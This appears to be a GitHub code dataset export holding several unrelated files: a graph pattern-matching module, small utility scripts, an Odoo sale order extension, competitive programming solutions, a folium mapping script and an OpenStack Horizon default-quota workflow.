cloned to produce this one,\n # and which should have its evidence updated when this pattern's evidence is updated.\n template: 'schema_attributes.SingularAttribute[Pattern[MatchSchema]]'\n\n @property\n def match(self) -> typing.Optional[MatchSchema]:\n \"\"\"The match representative of the pattern.\n\n NOTE: The evidence mean for the pattern represents its accuracy, whereas the evidence mean\n for the match representative represents the truth value to be matched in the image vertex.\n \"\"\"\n return self.match_representative.get(validate=False)\n\n def templated_clone(self) -> 'Pattern':\n \"\"\"Clone this pattern (and its selectors and children) to produce a new, identical deep\n copy. This pattern's evidence will be updated whenever the clone's is.\n\n The purpose for cloning of patterns is to ensure that during matching, each point of usage\n of a reusable pattern has its own unique and distinguishable identity. For example, consider\n the selector pattern, \"the\", in the phrase \"the eye of the storm\". If the same pattern is\n used for both occurrences of \"the\", then we cannot distinguish their matches and assign a\n different value to each usage.\n \"\"\"\n clone_vertex = self.database.add_vertex(self.vertex.preferred_role)\n clone = Pattern(clone_vertex, self.database)\n clone.template.set(self)\n clone.match_representative.set(self.match_representative.get(validate=False))\n for selector in self.selectors:\n clone.selectors.add(selector.templated_clone())\n for child in self.children:\n clone.children.add(child.templated_clone())\n return clone\n\n def find_matches(self, context: MatchMapping = None, *,\n partial: bool = False) -> typing.Iterator['orm.PatternMatch']:\n \"\"\"Search the graph for matching subgraphs. Return an iterator over the results, *roughly*\n in order of descending match quality. If the partial flag is True, non-isomorphic matches\n (those which do not fully map all patterns to graph structures) can be yielded. 
Otherwise,\n only isomorphic matches are yielded.\"\"\"\n if context is None:\n context = {}\n for mapping in self._find_matches(context, partial=partial):\n yield orm.PatternMatch.from_mapping(self, mapping, context)\n\n def _find_matches(self, context: MatchMapping = None, *,\n partial: bool = False) -> typing.Iterator[MatchMapping]:\n if context is None:\n context = {}\n for mapping in self._find_full_matches(context):\n partial = False # We only return a partial if a full match was not found.\n yield mapping\n if partial:\n mapping = self._find_partial_match(context)\n if mapping is not None:\n # Remove images with attached data if we are partially matching. Otherwise, during\n # calls to apply() we will confabulate memories.\n to_remove = []\n for key, (value, score) in mapping.items():\n # TODO: This is flawed. Evidence means & sample counts will be in the data. We\n # need to know which keys correspond to data elements, vs. those that are\n # metadata used throughout the system. Also, are time values (and maybe\n # others) somehow different from other types of values? Sometimes we are\n # dealing with generic match constraints, and other times we are dealing\n # with specific references. Should we explicitly mark the patterns to\n # indicate which is which?\n if (value.vertex.count_data_keys() > 0 and\n key not in context and\n key.template.get(validate=False) not in context):\n to_remove.append(key)\n for key in to_remove:\n del mapping[key]\n yield mapping\n\n def _find_partial_match(self, context: MatchMapping) -> typing.Optional[MatchMapping]:\n \"\"\"Find and return a partial match. If no partial match can be found, return None.\"\"\"\n for mapping in self._find_full_matches(context):\n return mapping # Take the first full match, if any.\n # If there were no full matches, we need to search for partial ones.\n mapping = dict(context)\n for selector in self.selectors:\n for mapping in selector._find_matches(mapping, partial=True):\n break # Take the first one returned, if any.\n for child in self.children:\n for mapping in child._find_matches(mapping, partial=True):\n break # Take the first one returned, if any.\n return mapping\n\n def _find_full_matches(self, context: MatchMapping) -> typing.Iterator[MatchMapping]:\n \"\"\"Return an iterator over full matches for this pattern. 
Context should be a dictionary\n partially mapping from related patterns to their images; yielded matches will be constrained\n to satisfy this mapping.\"\"\"\n template = self.template.get(validate=False)\n if template is not None and template in context:\n context = dict(context)\n context[self] = context[template]\n # Check for any child pattern that doesn't have a match.\n for child in self.children:\n if child not in context:\n for child_match in child._find_full_matches(context):\n partial_match = dict(context)\n partial_match.update(child_match)\n assert child in partial_match\n yield from self._find_full_matches(partial_match)\n return\n if self in context:\n # We already have a match candidate for this pattern.\n # Check for any selector pattern that doesn't have a match.\n for selector in self.selectors:\n if selector not in context:\n # Selectors must always match the same vertex as the parent pattern.\n extended_context = dict(context)\n extended_context[selector] = extended_context[self]\n for selector_match in selector._find_full_matches(extended_context):\n partial_match = dict(context)\n partial_match.update(selector_match)\n assert selector in partial_match\n yield from self._find_full_matches(partial_match)\n return\n # There are no selectors to check, just yield the match.\n yield context\n else:\n # Go through each candidate and yield the matches that result.\n for candidate in self.find_match_candidates(context):\n mapping = dict(context)\n mapping[self] = candidate\n yield from self._find_full_matches(mapping)\n\n def score_candidates(self, candidates: typing.Iterable['schema.Schema'],\n context: MatchMapping) -> typing.Dict['schema.Schema', float]:\n \"\"\"Filter and score the given match candidates.\"\"\"\n\n assert self not in context, (self, candidates, context)\n\n # Initialize candidate scores.\n # The preimage representative vertex's evidence mean represents the target truth value for\n # the image vertex.\n scores: typing.Dict['schema.Schema', float] = {}\n vertex_target_truth_value = evidence.get_evidence_mean(self.match.vertex)\n for candidate in candidates:\n vertex_actual_truth_value = evidence.get_evidence_mean(candidate.vertex)\n candidate_match_quality = 1 - (vertex_target_truth_value -\n vertex_actual_truth_value) ** 2\n scores[candidate] = candidate_match_quality\n\n # We treat each edge adjacent to the match representative that isn't used strictly for\n # pattern-related bookkeeping as a match constraint.\n vertex = self.match.vertex\n for edge in itertools.chain(vertex.iter_outbound(), vertex.iter_inbound()):\n if edge.label.name in PATTERN_RELATED_LABEL_NAMES:\n continue\n outbound = edge.source == vertex\n other_vertex: elements.Vertex = edge.sink if outbound else edge.source\n other_value = schema_registry.get_schema(other_vertex, self.database)\n # other_pattern = other_value.pattern.get(validate=False)\n required_neighbor = required_neighbor_score = None\n if other_value.represented_pattern.defined:\n for other_pattern, other in context.items():\n if other_pattern.match != other_value:\n continue\n # If the match representative of this pattern is connected to another match\n # representative which is already mapped in the context, then we should\n # constrain the candidates to those that connect in the same way to the vertex\n # that the other match representative is mapped to. 
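# --- Illustrative sketch, not part of the dataset record above ---
# _find_full_matches in the surrounding record extends a partial mapping one
# pattern at a time and recurses, yielding every complete assignment. The same
# backtracking-generator shape in miniature, with generic variables and a
# candidate callback instead of pattern vertices:
def assignments(variables, candidates, mapping=None):
    mapping = dict(mapping or {})
    pending = [v for v in variables if v not in mapping]
    if not pending:
        yield mapping          # every variable assigned: a full match
        return
    var = pending[0]
    for value in candidates(var, mapping):
        extended = dict(mapping)
        extended[var] = value
        yield from assignments(variables, candidates, extended)

# Tiny demo: two variables, each with two candidates -> four full mappings.
print(list(assignments(["x", "y"], lambda v, m: [0, 1])))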
In simpler terms, we want\n # to make sure that any edges on the preimage side are also present on the image\n # side, but we can only do that if both patterns are mapped already.\n other_pattern_match, other_pattern_score = other\n required_neighbor = other_pattern_match.vertex\n required_neighbor_score = other_pattern_score\n else:\n # If the match representative of this pattern is connected to a vertex which is not\n # a match representative, then we treat the edge to the other vertex as a *literal*.\n # Any match for this pattern must also connect to that same exact vertex in the same\n # way.\n required_neighbor = other_vertex\n required_neighbor_score = 1.0\n if required_neighbor is not None:\n # The preimage edge's evidence mean represents the target truth value for the\n # image edge.\n edge_target_truth_value = evidence.get_evidence_mean(edge)\n to_remove = []\n for candidate in scores:\n scores[candidate] *= required_neighbor_score\n edge_image = candidate.vertex.get_edge(edge.label, required_neighbor,\n outbound=outbound)\n if edge_image is None:\n if not edge.label.transitive:\n to_remove.append(candidate)\n continue\n # neighbors = candidate.vertex.iter_transitive_neighbors(edge.label,\n # outbound=outbound)\n # if required_neighbor not in neighbors:\n # to_remove.append(candidate)\n # continue\n\n path = candidate.vertex.get_shortest_transitive_path(edge.label,\n required_neighbor,\n outbound=outbound)\n if path is None:\n to_remove.append(candidate)\n continue\n\n # TODO: When we apply evidence to direct edges in apply(), we should also\n # do the same for each edge in transitive paths where they are what is\n # matched.\n # Use the product of evidence means of the edges that were followed to\n # modulate the score for the candidate.\n edge_actual_truth_value = 1\n for path_edge, _path_vertex in path:\n if path_edge is not None:\n edge_actual_truth_value *= evidence.get_evidence_mean(path_edge)\n else:\n edge_actual_truth_value = evidence.get_evidence_mean(edge_image)\n edge_match_quality = 1 - (edge_target_truth_value -\n edge_actual_truth_value) ** 2\n scores[candidate] *= edge_match_quality\n for candidate in to_remove:\n del scores[candidate]\n\n # Use selectors to further modulate the score.\n for selector in self.selectors:\n selector_scores = selector.score_candidates(scores, context)\n to_remove = []\n for candidate in scores:\n selector_score = selector_scores.get(candidate, None)\n if selector_score is None:\n to_remove.append(candidate)\n else:\n scores[candidate] *= selector_score\n for candidate in to_remove:\n del scores[candidate]\n\n return scores\n\n def find_match_candidates(self, context: MatchMapping = None,\n neighbor: elements.Vertex = None) \\\n -> typing.Iterator[typing.Tuple[MatchSchema, float]]:\n \"\"\"For each vertex that satisfies the pattern's constraints, yield the vertex as a\n candidate. NOTE: To satisfy a pattern's constraints, a vertex must also be a valid\n match for every selector of the pattern.\n\n If neighbor is not None, the method only looks at vertices that are neighbors to the given\n vertex.\n \"\"\"\n\n # Find edges to/from the match representative which link to vertices that are not match\n # representatives. Use these non-pattern vertices as a search starting point. For example,\n # if the match representative is an instance with a non-pattern kind associated with it, we\n # can look at instances of that kind. 
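# --- Illustrative sketch, not part of the dataset record above ---
# score_candidates in the surrounding record rates a candidate by
# 1 - (target - actual)**2, where both truth values live in [0, 1]: a perfect
# match scores 1.0 and the score falls off quadratically with the gap.
def match_quality(target: float, actual: float) -> float:
    return 1 - (target - actual) ** 2

print(match_quality(0.9, 0.9))  # 1.0  (exact agreement)
print(match_quality(0.9, 0.4))  # 0.75 (gap of 0.5)
print(match_quality(1.0, 0.0))  # 0.0  (maximal disagreement)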
Once we have a source of candidates identified in this\n # way, we can filter it through the constraints to identify reasonable candidates.\n # We look first at intransitive edges because they are more efficient to work with.\n vertex = self.match.vertex\n for edge in itertools.chain(vertex.iter_outbound(), vertex.iter_inbound()):\n if edge.label.name in PATTERN_RELATED_LABEL_NAMES or edge.label.transitive:\n continue\n outbound = edge.source == vertex\n other_vertex: elements.Vertex = edge.sink if outbound else edge.source\n if neighbor is not None and neighbor != other_vertex:\n continue\n other_value = schema_registry.get_schema(other_vertex, self.database)\n # other_pattern = other_value.pattern.get(validate=False)\n if other_value.represented_pattern.defined:\n for other_pattern, other in context.items():\n if other_pattern.match != other_value:\n continue\n # Overwrite other_value/other_vertex with its image\n other_value, other_score = context[other_pattern]\n other_vertex = other_value.vertex\n break\n else:\n continue\n if outbound:\n candidate_set = {other_edge.source for other_edge in other_vertex.iter_inbound()\n if other_edge.label == edge.label}\n else:\n candidate_set = {other_edge.sink for other_edge in other_vertex.iter_outbound()\n if other_edge.label == edge.label}\n break\n else:\n # If we can't find a good intransitive edge, look at transitive ones.\n for edge in itertools.chain(vertex.iter_outbound(), vertex.iter_inbound()):\n if edge.label.name in PATTERN_RELATED_LABEL_NAMES or not edge.label.transitive:\n continue\n outbound = edge.source == vertex\n other_vertex: elements.Vertex = edge.sink if outbound else edge.source\n if neighbor is not None and neighbor != other_vertex:\n continue\n other_value = schema_registry.get_schema(other_vertex, self.database)\n # other_pattern = other_value.pattern.get(validate=False)\n if other_value.represented_pattern.defined:\n for other_pattern, other in context.items():\n if other_pattern.match != other_value:\n continue\n # Overwrite other_value/other_vertex with its image\n other_value, other_score = context[other_pattern]\n other_vertex = other_value.vertex\n break\n else:\n continue\n candidate_set = set(other_vertex.iter_transitive_neighbors(edge.label,\n outbound=not outbound))\n break\n else:\n # If we don't have a relevant and well-defined set of candidates to choose from, we\n # should just fail to match. Trying every vertex in the graph is simply not an\n # option.\n logging.info(\"No candidates found for: %s\", self)\n return\n\n # TODO: We should maybe check data keys first. 
But I'm not sure if they'll even be used\n # for pattern matching yet.\n\n candidate_set = {schema_registry.get_schema(candidate, self.database)\n for candidate in candidate_set}\n candidate_set = {value for value in candidate_set if not value.represented_pattern.defined}\n candidate_scores = self.score_candidates(candidate_set, context)\n\n # Yield them in descending order of evidence to get the best matches first.\n yield from sorted(candidate_scores.items(), key=lambda item: item[-1], reverse=True)\n\n def iter_trigger_points(self) -> typing.Iterator[typing.Tuple['Pattern', 'schema.Schema']]:\n vertex = self.match.vertex\n for edge in itertools.chain(vertex.iter_outbound(), vertex.iter_inbound()):\n if edge.label.name in PATTERN_RELATED_LABEL_NAMES or edge.label.transitive:\n continue\n outbound = edge.source == vertex\n other_vertex: elements.Vertex = edge.sink if outbound else edge.source\n other_value = schema_registry.get_schema(other_vertex, self.database)\n if not other_value.represented_pattern.defined:\n yield self, other_value\n for child in self.children:\n yield from child.iter_trigger_points()\n","repo_name":"hosford42/Semantics","sub_path":"semantics/kb_layer/orm/_pattern_schema.py","file_name":"_pattern_schema.py","file_ext":"py","file_size_in_byte":21255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"13858953839","text":"from dbd import sqliteQueries as sql\nfrom dbd.ram2dbd import ram2sqlite\nfrom xdb.xdb2ram import Parser\ndb_path = \"ResultAndResource/resultXml2Dbd.db\"\nmetadata_path=\"ResultAndResource/tasks.xml\"\nparser = Parser(metadata_path) #применяем xdb2ram\nschema = parser.parseXdb2Ram() #вызываем метод класса для конвертирования xml в ram\n\nuploader = ram2sqlite(sql, db_path) #вызываем конструктор класса ram2sqlite\nuploader.upload(schema) #вызываем метод\n\nprint(\"database \"+db_path+\" was created\")","repo_name":"VovaMax/letsGo","sub_path":"xml2dbd.py","file_name":"xml2dbd.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25122511173","text":"\nimport os\nimport json\n\n\n# variables \nprefix = \"?\"\nembedColor = 0xd3d3d3\nicon = \"https://cdn.discordapp.com/avatars/917390822939447307/762c5053cda62e609ee954b7868b42d5.png?size=4096\"\n\n\nallowedChannels = json.loads(os.environ['BOT_INTERACTION_CHANNEL_ID'])\n\nwallet_ERC20 = \"soon\"\nwallet_akash = \"soon\"\n","repo_name":"golemfactory/GDP-tech-support","sub_path":"src/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27213940256","text":"\n\ndef cadastrar() -> dict:\n\n print('Informações')\n nome = ler_nome()\n idade = ler_idade()\n\n return {'nome': nome, 'idade': idade}\n\n\ndef ler_nome() -> str:\n\n msn = 'Nome: '\n\n while True:\n nome = input(msn).strip()\n\n nome = nome.replace('.', '')\n\n if not nome.isdigit():\n return nome.title()\n msn = 'Informe um nome válido: '\n\n\ndef ler_idade() -> int:\n\n while True:\n idade = ler_int('Idade: ')\n\n if idade <= 0:\n print(f'Idade inválida: {idade}', msn=True)\n continue\n\n return idade\n\n\ndef menu():\n print(\n f'{\" Menu \":=^32}',\n f'{ \"1 - Listar Pessoas\"}',\n f'{ \"2 - Cadastrar Pessoa\"}',\n f'{ \"3 - sair\"}',\n f'{\"=\"*32}',\n sep='\\n'\n )\n\n\ndef ler_int(msn):\n try:\n valor = int(input(msn))\n\n return valor\n except 
ValueError:\n print(f'valor inválido: {valor}')\n return ler_int('Insira uma valor válido: ')\n\n\ndef listar_pessoas(lista):\n\n for pessoa in lista:\n print(f'Nome: {pessoa[\"nome\"]}, idade: {pessoa[\"idade\"]}')\n","repo_name":"Lidianacosta/trilha-back-end-python","sub_path":"capacitacao/semana_IIIIII/basic/ erros_e_excecoes/115/modelo/dados/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29810390128","text":"p, m = map(int, input().split())\n\nrooms = []\nfor _ in range(p):\n line = input().split()\n level, name = int(line[0]), line[1]\n for room in rooms:\n # 입장 가능한 방이 있다면 다 찰 때까지 대기 (제일 먼저 생성된 방으로)\n if room[0][0] - 10 <= level <= room[0][0] + 10 and len(room) < m:\n room.append((level, name))\n break\n # 매칭 가능한 방이 없다면 방 생성 (-10 ~ +10)\n else:\n room = [(level, name)]\n rooms.append(room)\n\nfor room in rooms:\n if len(room) == m:\n print('Started!')\n else:\n print('Waiting!')\n\n for player in sorted(room, key=lambda x: x[1]):\n print(player[0], player[1])\n","repo_name":"zoolake/pythonPS","sub_path":"boj/20006.py","file_name":"20006.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33917977084","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, timedelta\nfrom functools import partial\nfrom itertools import groupby\n\nfrom odoo import api, fields, models, SUPERUSER_ID, _\nfrom odoo.exceptions import AccessError, UserError, ValidationError\nfrom odoo.tools.misc import formatLang, get_lang\nfrom odoo.osv import expression\nfrom odoo.tools import float_is_zero, float_compare\n\nfrom werkzeug.urls import url_encode\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n @api.onchange('partner_id')\n def onchange_partner_id(self):\n \"\"\"\n Update the following fields when the partner is changed:\n - Pricelist\n - Payment terms\n - Invoice address\n - Delivery address\n - Sales Team\n - Incoterms\n # - Agente Esterno\n \"\"\"\n if not self.partner_id:\n self.update({\n 'partner_invoice_id': False,\n 'partner_shipping_id': False,\n 'fiscal_position_id': False,\n 'x_studio_incoterms': '',\n # 'x_studio_agente_esterno' : '',\n })\n return\n\n self = self.with_company(self.company_id)\n\n addr = self.partner_id.address_get(['delivery', 'invoice'])\n partner_user = self.partner_id.user_id or self.partner_id.commercial_partner_id.user_id\n incoterms = self.partner_id.x_studio_incoterms_1.code\n # agente_esterno = self.partner_id._studio_many2one_field_6csFz.display_name\n values = {\n 'pricelist_id': self.partner_id.property_product_pricelist and self.partner_id.property_product_pricelist.id or False,\n 'payment_term_id': self.partner_id.property_payment_term_id and self.partner_id.property_payment_term_id.id or False,\n 'partner_invoice_id': addr['invoice'],\n 'partner_shipping_id': addr['delivery'],\n 'x_studio_incoterms': incoterms,\n # 'x_studio_agente_esterno' : ageste_esterno,\n }\n user_id = partner_user.id\n if not self.env.context.get('not_self_saleperson'):\n user_id = user_id or self.env.uid\n if user_id and self.user_id.id != user_id:\n values['user_id'] = user_id\n\n if self.env['ir.config_parameter'].sudo().get_param('account.use_invoice_terms') and self.env.company.invoice_terms:\n values['note'] = self.with_context(lang=self.partner_id.lang).env.company.invoice_terms\n if not 
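# --- Illustrative sketch, not part of the dataset record above ---
# Note a bug in ler_int in the preceding record: in the except branch, `valor`
# is printed before it was ever assigned (int() raised first), so the handler
# itself raises NameError; the recursive retry also grows the call stack on
# every bad input. An iterative variant that reports the raw text instead:
def read_int(prompt: str) -> int:
    while True:
        raw = input(prompt)
        try:
            return int(raw)
        except ValueError:
            print(f'valor inválido: {raw}')
            prompt = 'Insira um valor válido: '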
self.env.context.get('not_self_saleperson') or not self.team_id:\n values['team_id'] = self.env['crm.team'].with_context(\n default_team_id=self.partner_id.team_id.id\n )._get_default_team_id(domain=['|', ('company_id', '=', self.company_id.id), ('company_id', '=', False)], user_id=user_id)\n self.update(values)\n\n# def create(self, vals):\n# if 'company_id' in vals:\n# self = self.with_company(vals['company_id'])\n# if vals.get('name', _('New')) == _('New'):\n# seq_date = None\n# if 'date_order' in vals:\n# seq_date = fields.Datetime.context_timestamp(self, fields.Datetime.to_datetime(vals['date_order']))\n# vals['name'] = self.env['ir.sequence'].next_by_code('sale.order', sequence_date=seq_date) or _('New')\n\n# # Makes sure partner_invoice_id', 'partner_shipping_id' and 'pricelist_id' are defined\n# if any(f not in vals for f in ['partner_invoice_id', 'partner_shipping_id', 'pricelist_id']):\n# partner = self.env['res.partner'].browse(vals.get('partner_id'))\n# addr = partner.address_get(['delivery', 'invoice'])\n# vals['partner_invoice_id'] = vals.setdefault('partner_invoice_id', addr['invoice'])\n# vals['partner_shipping_id'] = vals.setdefault('partner_shipping_id', addr['delivery'])\n# vals['pricelist_id'] = vals.setdefault('pricelist_id', partner.property_product_pricelist.id)\n# vals['x_studio_incoterms'] = partner.x_studio_incoterms_1.code\n# result = super(SaleOrder, self).create(vals)\n# return result\n\n","repo_name":"stayted/DA-Odoo","sub_path":"MPFE-create-order/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26665979375","text":"#\n# @lc app=leetcode id=199 lang=python3\n#\n# [199] Binary Tree Right Side View\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n\n if not root:\n return []\n \n queue = deque([root])\n \n ans = []\n while queue:\n items = []\n for i in range(len(queue)):\n root = queue.popleft()\n items.append(root.val)\n if root.left:\n queue.append(root.left)\n if root.right:\n queue.append(root.right)\n ans.append(items[-1])\n \n return ans\n \n# @lc code=end\n\n","repo_name":"waynewu6250/LeetCode-Solutions","sub_path":"199.binary-tree-right-side-view.py","file_name":"199.binary-tree-right-side-view.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24827864618","text":"\r\n\r\nfrom lib_api import foursquare_visual\r\n\r\nfrom folium import Marker, Icon, Map\r\nimport pandas as pd\r\nfrom keplergl import KeplerGl\r\n\r\ndef imprime_mapa(lat,lon):\r\n \"\"\"\r\n imprime un mapa carto de los serviciones que estamos estudiando\r\n lo hace centrado en lat long y. 
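# --- Illustrative sketch, not part of the dataset records above ---
# The rightSideView record above uses deque (and the List annotation) without
# importing them; LeetCode's judge injects those names. A self-contained,
# runnable version of the same level-order idea:
from collections import deque

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def right_side_view(root):
    """Last node of each BFS level, i.e. the tree as seen from the right."""
    if not root:
        return []
    ans, queue = [], deque([root])
    while queue:
        for _ in range(len(queue)):
            node = queue.popleft()
            if node.left:
                queue.append(node.left)
            if node.right:
                queue.append(node.right)
        ans.append(node.val)  # node is the rightmost of the level just drained
    return ans

#      1
#     / \
#    2   3    -> [1, 3, 4]
#     \
#      4
print(right_side_view(TreeNode(1, TreeNode(2, None, TreeNode(4)), TreeNode(3))))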
para realizar el mapa consulta en FS los resultados.\r\n\r\n tokens tiene que estar en .env\r\n\r\n devuelve el mapa\r\n \"\"\"\r\n\r\n lista=[\"colegio\", \"starbucks\",\"estadio de baloncesto\", \"bar\",\"restaurante vegano\",\"peluqueria perros\",\"aeropuerto\"]\r\n \r\n tipo=list()\r\n latitud=list()\r\n longitud=list()\r\n\r\n for q in lista:\r\n resultado=foursquare_visual({'latitud':lat, 'longitud':lon},q)\r\n \r\n for r in resultado:\r\n tipo.append(q.replace(\" \",\"_\"))\r\n latitud.append(r['latitud'])\r\n longitud.append(r['longitud'])\r\n #if q == \"colegio\" or q == \"peluqueria perros\":\r\n # print(pd.DataFrame({'tipo':tipo,'latitud':latitud,'logitud':longitud}))\r\n # raise\r\n \r\n \r\n df=pd.DataFrame({'tipo':tipo,'latitud':latitud,'logitud':longitud})\r\n\r\n \r\n\r\n mapa = Map(location=[lat,lon],zoom_start=15)\r\n\r\n empresa = {\r\n \"location\":[lat, lon ],\r\n \"tooltip\" : \"Empresa\"\r\n }\r\n icon = Icon(color = \"red\",\r\n prefix = \"fa\",\r\n icon = \"fa-dot-circle-o\",\r\n icon_color = \"white\"\r\n )\r\n Marker(**empresa,icon = icon ).add_to(mapa)\r\n\r\n\r\n for i, row in df.iterrows():\r\n establecimiento = {\r\n \"location\":[row[\"latitud\"], row[\"logitud\"]],\r\n \"tooltip\" : row[\"tipo\"].replace(\"_\",\" \").capitalize()\r\n }\r\n\r\n if row[\"tipo\"] == \"starbucks\":\r\n icon = Icon(color = \"green\",\r\n prefix = \"fa\",\r\n icon = \"fa-coffee\",\r\n icon_color = \"white\"\r\n )\r\n \r\n elif row[\"tipo\"] == \"restaurante_vegano\":\r\n icon = Icon(color = \"green\",\r\n prefix = \"fa\",\r\n icon = \"leaf\",\r\n icon_color = \"black\"\r\n )\r\n\r\n elif row[\"tipo\"] == \"colegio\":\r\n icon = Icon(color = \"blue\",\r\n prefix = \"fa\",\r\n icon = \"fa-graduation-cap \",\r\n icon_color = \"black\"\r\n )\r\n \r\n elif row[\"tipo\"] == \"peluqueria_perros\":\r\n icon = Icon(color = \"red\",\r\n prefix = \"fa\",\r\n icon = \"fa-paw\",\r\n icon_color = \"black\"\r\n )\r\n\r\n elif row[\"tipo\"] == \"estadio_de_baloncesto\":\r\n icon = Icon(color = \"orange\",\r\n prefix = \"fa\",\r\n icon = \"fa-futbol-o \",\r\n icon_color = \"black\"\r\n )\r\n\r\n elif row[\"tipo\"] == \"aeropuerto\":\r\n icon = Icon(color = \"white\",\r\n prefix = \"fa\",\r\n icon = \"fa-plane\",\r\n icon_color = \"black\"\r\n )\r\n elif row[\"tipo\"] == \"bar\":\r\n icon = Icon(color = \"pink\",\r\n prefix = \"fa\",\r\n icon = \"fa-glass\",\r\n icon_color = \"white\"\r\n )\r\n \r\n else:\r\n prefix = \"fa\",\r\n icon = \"briefcase\",\r\n icon_color = \"black\" \r\n Marker(**establecimiento,icon = icon ).add_to(mapa)\r\n return mapa\r\n\r\ndef imprime_kepler(df):\r\n \"\"\"\r\n no lo he podido utilizar\r\n \"\"\"\r\n map_kepler= KeplerGl(height=700, weight = 500, data={'Empresas': df})\r\n map_kepler\r\n#show the map","repo_name":"emilio-carrasco/geospace_project","sub_path":"libs/lib_visual.py","file_name":"lib_visual.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73512489113","text":"import logging\n\nfrom django.utils.translation import gettext_lazy as _\n\nfrom horizon import exceptions\nfrom horizon import forms\nfrom horizon import workflows\n\nfrom openstack_dashboard.api import base\nfrom openstack_dashboard.api import cinder\nfrom openstack_dashboard.api import nova\nfrom openstack_dashboard.usage import quotas\n\nLOG = logging.getLogger(__name__)\n\n\nclass UpdateDefaultComputeQuotasAction(workflows.Action):\n instances = forms.IntegerField(min_value=-1, 
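# --- Illustrative sketch, not part of the dataset record above ---
# The long if/elif chain in the surrounding record that picks a folium Icon
# per establishment type can be collapsed into a lookup table. The kwargs
# below mirror two of the original's categories; the coordinates are
# hypothetical placeholders, not from the source.
from folium import Icon, Map, Marker

ICON_KWARGS = {
    "starbucks": dict(color="green", prefix="fa", icon="fa-coffee", icon_color="white"),
    "colegio": dict(color="blue", prefix="fa", icon="fa-graduation-cap", icon_color="black"),
}
DEFAULT = dict(color="gray", prefix="fa", icon="briefcase", icon_color="black")

mapa = Map(location=[40.4168, -3.7038], zoom_start=15)
for tipo, lat, lon in [("starbucks", 40.417, -3.703), ("colegio", 40.418, -3.705)]:
    Marker(location=[lat, lon], tooltip=tipo.capitalize(),
           icon=Icon(**ICON_KWARGS.get(tipo, DEFAULT))).add_to(mapa)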
label=_(\"Instances\"))\n cores = forms.IntegerField(min_value=-1, label=_(\"VCPUs\"))\n ram = forms.IntegerField(min_value=-1, label=_(\"RAM (MB)\"))\n metadata_items = forms.IntegerField(min_value=-1,\n label=_(\"Metadata Items\"))\n key_pairs = forms.IntegerField(min_value=-1, label=_(\"Key Pairs\"))\n server_groups = forms.IntegerField(min_value=-1, label=_(\"Server Groups\"))\n server_group_members = forms.IntegerField(\n min_value=-1, label=_(\"Server Group Members\"))\n injected_files = forms.IntegerField(min_value=-1,\n label=_(\"Injected Files\"))\n injected_file_content_bytes = forms.IntegerField(\n min_value=-1,\n label=_(\"Injected File Content (B)\"))\n injected_file_path_bytes = forms.IntegerField(\n min_value=-1,\n label=_(\"Length of Injected File Path\"))\n\n def __init__(self, request, context, *args, **kwargs):\n super().__init__(request, context, *args, **kwargs)\n disabled_quotas = context['disabled_quotas']\n for field in disabled_quotas:\n if field in self.fields:\n self.fields[field].required = False\n self.fields[field].widget = forms.HiddenInput()\n\n def handle(self, request, context):\n nova_data = {\n key: value for key, value in context.items()\n if key in quotas.NOVA_QUOTA_FIELDS\n }\n try:\n nova.default_quota_update(request, **nova_data)\n return True\n except Exception:\n exceptions.handle(request,\n _('Unable to update default compute quotas.'))\n return False\n\n class Meta(object):\n name = _(\"Compute\")\n slug = 'update_default_compute_quotas'\n help_text = _(\"From here you can update the default compute quotas \"\n \"(max limits).\")\n\n\nclass UpdateDefaultComputeQuotasStep(workflows.Step):\n action_class = UpdateDefaultComputeQuotasAction\n contributes = quotas.NOVA_QUOTA_FIELDS\n depends_on = ('disabled_quotas',)\n\n def prepare_action_context(self, request, context):\n try:\n quota_defaults = nova.default_quota_get(request,\n request.user.tenant_id)\n for field in quotas.NOVA_QUOTA_FIELDS:\n context[field] = quota_defaults.get(field).limit\n except Exception:\n exceptions.handle(request,\n _('Unable to retrieve default compute quotas.'))\n return context\n\n def allowed(self, request):\n return base.is_service_enabled(request, 'compute')\n\n\nclass UpdateDefaultVolumeQuotasAction(workflows.Action):\n volumes = forms.IntegerField(min_value=-1, label=_(\"Volumes\"))\n gigabytes = forms.IntegerField(\n min_value=-1,\n label=_(\"Total Size of Volumes and Snapshots (GiB)\"))\n snapshots = forms.IntegerField(min_value=-1, label=_(\"Volume Snapshots\"))\n\n def __init__(self, request, context, *args, **kwargs):\n super().__init__(request, context, *args, **kwargs)\n disabled_quotas = context['disabled_quotas']\n for field in disabled_quotas:\n if field in self.fields:\n self.fields[field].required = False\n self.fields[field].widget = forms.HiddenInput()\n\n def handle(self, request, context):\n cinder_data = {\n key: value for key, value in context.items()\n if key in quotas.CINDER_QUOTA_FIELDS\n }\n try:\n cinder.default_quota_update(request, **cinder_data)\n return True\n except Exception:\n exceptions.handle(request,\n _('Unable to update default volume quotas.'))\n return False\n\n class Meta(object):\n name = _(\"Volume\")\n slug = 'update_default_volume_quotas'\n help_text = _(\"From here you can update the default volume quotas \"\n \"(max 